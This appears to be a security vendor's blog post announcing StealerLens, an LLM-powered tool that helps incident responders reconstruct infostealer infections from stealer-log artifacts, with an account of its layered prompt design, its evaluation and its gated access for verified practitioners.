StealerLens: Turn Hours of Stealer Log Analysis Into a Coffee Break

By Olivier Bilodeau, Principal Cybersecurity Researcher, co-authored with Estelle Ruellan, Threat Intelligence Researcher

Over 50 million stealer logs surfaced on underground channels in 2025. Each one is dozens of file artifacts containing tens of thousands of lines of browser history, session cookies, and stolen browser credentials. Somewhere in that pile sits the answer to the question every incident responder actually cares about: how did this machine get infected, and what is the impact on my organization? Gathering that intelligence by hand, though, is so slow that in practice almost nobody does.

That is the problem StealerLens was built to solve. Today, alongside our FIRSTCON presentation Introducing StealerLens: An LLM-Powered Forensics Microscope to Accelerate InfoStealer Investigations on Wednesday, June 17, we’re making the tool available to the community.

But What are Stealer Logs?

A stealer log is the output of an infostealer malware that quietly harvests everything of value from a victim’s machine: saved browser passwords, session cookies, autofill data, cryptocurrency wallets, and personal files, then packages it all for sale or reuse. Every successful infection produces one log. Those logs are traded in bulk on dark web markets and Telegram channels, big enough business to draw global law enforcement takedowns and consequential enough that hundreds of thousands of corporate credentials routinely surface in the trade.

These infections are everywhere right now, and the delivery technique dominating the moment is ClickFix: a fake CAPTCHA or verification prompt that tricks the victim into copying a malicious PowerShell command and running it themselves. It is used to push infostealers through lures as ordinary as fake TikTok “activation” tutorials. The lure changes; the result is the same. Another log, another victim.

What is StealerLens?

StealerLens reads a stealer log and produces a documented infection hypothesis in minutes. It tells you the most likely source of the infection, what the malware was disguised as, the behaviors it exhibited, the delivery vector, and it points to the specific lines in the log that support each conclusion.

Preview of StealerLens

The last part matters as much as the rest. StealerLens is not a black box that hands you a verdict; it hands you a hypothesis with its evidence attached, so you can confirm it, challenge it, or throw it out. The analyst is not replaced. The analyst is armed to go faster and further.

Stealer Logs are Forensic Goldmines, Not Just Stolen Credentials

Most people look at a stealer log and see a trove of stolen passwords and cookies. That’s the obvious value, and it’s why these logs get bought and sold. But it undersells what’s actually sitting in the file.

A stealer log is a crime scene the malware documented itself. Buried among the credentials are artifacts that describe the infection as it happened. Once you learn to read them, every component tells you something:

• User Information.txt: a snapshot of the compromised system at the moment of infection: the malware’s execution path, the infection date, hardware and user details, and often the malware family itself. This is the starting point for any investigation.
• Software.txt: the installed-software inventory. It reveals vulnerable applications, software the malware was masquerading as, and whether security tooling like an EDR was even present.
• Processes.txt: a photograph of running processes at infection time. Here you catch the malware in the act: execution indicators, post-exploitation activity such as PowerShell, and sometimes process injection.
• Browser histories: URLs, page titles, and timestamps that let you reconstruct searches and downloads. This is often where the delivery vector hides: a malicious download site, a phishing page, or a tell-tale search for “cracked software.”
• Clipboard.txt: the contents of the clipboard at infection time. Remarkably often, it’s the malicious URL or PowerShell payload the victim copied moments before getting infected.
• Infection screenshots: when present, the jackpot. A capture of the victim’s desktop at the moment of compromise, frequently with the fake installer, malicious site, or bogus tutorial still on screen.

The clues are there. The cruel part is that finding them means reading the entire log, hundreds and sometimes thousands of lines, and then correlating across files, because one artifact often recontextualizes another you’d already dismissed as benign. It’s a needle-in-a-haystack job that’s slow, error-prone, and nearly impossible to do at scale.

Analysis from StealerLens

Consider the raw volume. A compressed 2.3 MB stealer log expands to 8,698,701 characters of text including spaces, roughly 1.5 million words, or about 5,000 pages. Reading a single log straight through would be like reading the novel Dune ten times over (the audiobook runs 21 hours; now imagine that 10 times) or the Bible twice. Of course nobody reads a stealer log front to back like a novel, but that is still an enormous amount of text to wade through, sort, dismiss, and investigate.

How It Works

Demo of StealerLens

StealerLens uses a layered LLM architecture: one artifact, one specialized prompt. Each log component is handed to a prompt tuned specifically for it (the questions you ask of a process list are not the questions you ask of a browser history), and a final master prompt correlates all of those outputs into a single coherent infection narrative. We chose this modular design over one giant monolithic prompt for concrete reasons:

• Each layer stays focused on a single kind of evidence, so it’s more precise
• Each layer is easier to maintain
• Each can evolve independently as malware families and log formats change, without forcing a rewrite of the whole system

The screenshot-analysis layer will look familiar to anyone who caught our Black Hat USA 2025 presentation, Hackers Dropping Mid-Heist Selfies: LLM Identifies Infostealer Infection Vectors and Extracts IoCs. That pipeline is now integrated directly into StealerLens as one of its layers.

We’re not dumping every prompt into this post. The full set, with the reasoning behind each one, lives in the talk materials and PDF, and you can find those alongside the recording of the talk. (If you’re reading this right at launch and the FIRSTCON recording isn’t up yet, the slides and PDF are available now, and we’ll link the video here as soon as it posts.)

Does it Actually Work?

We didn’t stop at a handful of test cases. We pointed StealerLens at more than 10,000 real stealer logs to profile victims at scale, work we presented at the RSAC Conference and wrote up in Victim Profiling with Stealer Malware.

What we care about most, though, is how the system behaves when it isn’t sure. Across our trials, when a log was too incomplete to support a conclusion, StealerLens said so rather than inventing one. When the evidence pointed two plausible ways at once, it laid out both hypotheses and left the call to the analyst. A confident “I don’t know” is worth far more than a fabricated answer that wastes an hour of verification. That is exactly the job: clear the brush and support the human, not pretend to replace them.

Getting Access

StealerLens is free for verified cybersecurity professionals. That means our customers, and members of our Flare Academy Discord who have gone through the verification process to become verified practitioners. You might be wondering why we are gating access to this at all.

It’s because the tool would be just as useful to the other side. In a threat actor’s hands, StealerLens would let them triage their own stealer logs faster, surface the high-value victims quicker, and learn how to harden their logs against exactly this kind of analysis, making everyone’s job harder. Reserving access for verified practitioners is how we avoid handing both sides the same accelerant and kicking off an arms race we’d rather not feed.

Here’s how to get in:

1. Join the Flare Academy Discord and follow the instructions in the #verify-here channel.
2. Get verified. Verification is based on your work email, LinkedIn, and employer, plus a short video verification call. Full details: become a verified community member.
3. Once you hold the verified-practitioners role, authenticate at stealerlens.labs.flare.io and start analyzing.

Existing Flare customers can request the StealerLens Labs feature from their customer success representative. It will be integrated into their platform free of charge.

Where this is Going

StealerLens is a freely accessible Flare experiment. We integrated a feedback mechanism into it and we will listen to community feedback. In the short term, development will focus on risk-analysis labeling: automatically tagging logs with the attributes that determine how dangerous a given infection actually is, such as has-vpn-access, has-corporate-credentials, is-developer, and has-cloud-admin-access. Those labels are designed to feed agentic triage tools downstream, so the worst infections rise to the top of the queue automatically instead of waiting for a human to find them.

If you want the deeper technical dive (the full architecture, every prompt, and the engineering decisions and dead ends behind them), that’s what the FIRSTCON talk is for. The debrushing that used to take hours now takes minutes. Come see how.

We firmly believe that incident responders should have access to the best tools and the best information so they can do their job faster. StealerLens is part of that.